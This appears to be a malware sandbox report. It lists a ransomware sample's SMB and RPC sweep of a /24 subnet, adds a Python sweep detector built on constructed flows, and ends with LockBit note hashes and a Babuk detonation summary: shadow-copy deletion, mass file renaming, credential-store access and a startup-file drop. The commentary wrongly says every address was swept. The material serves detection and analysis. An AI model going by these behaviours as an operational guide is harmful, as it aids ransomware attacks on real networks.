N/A 10.127.0.222:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.80:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.0:135 tcp

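The table above is a full sweep of 10.127.0.0/24: every address from .0 to .254 on TCP 445 (SMB) and then on TCP 135 (RPC endpoint mapper), which is how this LockBit build locates hosts to encrypt over the network. The detector below is an added example, not part of the report: it keeps, per (source, destination port), a sliding window of recent connections and raises one alert when the number of distinct destinations in the window crosses a threshold, then keeps accumulating targets so the alert shows the full footprint. The flow records are constructed to mirror the table (the victim address 10.127.0.13 is an assumption, since the report does not state the sandbox's own IP), with a second host doing ordinary file-server traffic as a control; the 60 s window and 20-target threshold are assumptions to tune per environment.

```python
"""Detect a single-host sweep of a /24 on SMB (445) and RPC endpoint mapper (135).
Added example over constructed flow records, not the report's own packet data."""
from __future__ import annotations

import ipaddress
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Flow:
    ts: float      # seconds since start of capture
    src: str
    dst: str
    dport: int


@dataclass
class Sweep:
    src: str
    dport: int
    first_ts: float
    last_ts: float
    targets: set[str] = field(default_factory=set)

    @property
    def subnets(self) -> set[str]:
        """The /24 networks covered by the sweep, for the alert summary."""
        return {str(ipaddress.ip_network(f"{d}/24", strict=False)) for d in self.targets}


def build_sample_flows() -> list[Flow]:
    """Constructed traffic: the victim (assumed 10.127.0.13) touches every address of
    10.127.0.0/24 from .0 to .254 on 445, then on 135, about 80 ms apart. A second
    host talks to three file servers every 5 s as a benign control."""
    flows: list[Flow] = []
    t = 0.0
    for port in (445, 135):
        for last_octet in range(255):
            dst = f"10.127.0.{last_octet}"
            if dst == "10.127.0.13":      # a host does not scan itself
                continue
            flows.append(Flow(t, "10.127.0.13", dst, port))
            t += 0.08
    for i in range(30):
        flows.append(Flow(i * 5.0, "10.127.0.40", f"10.127.0.{1 + i % 3}", 445))
    return flows


def detect_sweeps(flows: list[Flow], window_s: float = 60.0, min_targets: int = 20) -> list[Sweep]:
    """Per (src, dport), count distinct destinations inside a sliding time window.
    Alert once per key when the count reaches min_targets; keep extending the alert
    with later targets so the final record shows the whole footprint."""
    recent: dict[tuple[str, int], deque] = defaultdict(deque)   # key -> deque[(ts, dst)]
    alerts: dict[tuple[str, int], Sweep] = {}
    for f in sorted(flows, key=lambda x: x.ts):
        key = (f.src, f.dport)
        q = recent[key]
        q.append((f.ts, f.dst))
        while q and f.ts - q[0][0] > window_s:
            q.popleft()
        distinct = {d for _, d in q}
        if key in alerts:
            alerts[key].targets.update(distinct)
            alerts[key].last_ts = f.ts
        elif len(distinct) >= min_targets:
            alerts[key] = Sweep(f.src, f.dport, q[0][0], f.ts, set(distinct))
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_sweeps(build_sample_flows()):
        print(f"{a.src} -> {len(a.targets)} hosts on tcp/{a.dport} in "
              f"{a.last_ts - a.first_ts:.1f}s, subnets {sorted(a.subnets)}")
```

Counting distinct destinations per port, rather than raw connection attempts, is what separates this from a chatty but legitimate client: the control host in the sample makes 30 connections on 445 but only ever to three servers, so it never approaches the threshold. On a real network, feed this from firewall or NetFlow/Zeek conn logs, and expect the 135 sweep to follow the 445 sweep by seconds, as it does in the table.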

Files

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

MD5 a8a6fdbbbb8bd3128b0dd266dc398f2b
SHA1 f53836032a882552dfa46d2a99a86850f6451b26
SHA256 61afe8b4d30f2db46c0b198c2eee72ad1e21525676c686d433a6b95e0a147f42
SHA512 7b9c4d314e6b48ca060b8a4596070cd137dcc25a2f86b3c1efeb8ebd2618e8c1b8171e0afd6a1a2db29535d31a6d34e033db2a37b2faca15fb2effed4ac99d6a

C:\Users\Admin\Desktop\LockBit-note.hta

MD5 fd5d9cf71540fae159317cfa3f72f98a
SHA1 0e02c08d660680aa59047d2c794c4801f066f51a
SHA256 d67a1ee5d0bc52cfc70b1cc262da2857dc907904fd9b5a504eefb2e61fdfbd90
SHA512 9236ec9162f89fafc60a998099df36da5e2da396ea452373c81d0caf8ac6be1c3f7580ee7967fb9fb7f6bc19d6ffa051f55a2fe36d4108ea8e97142c06915d62

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

122s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (478) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
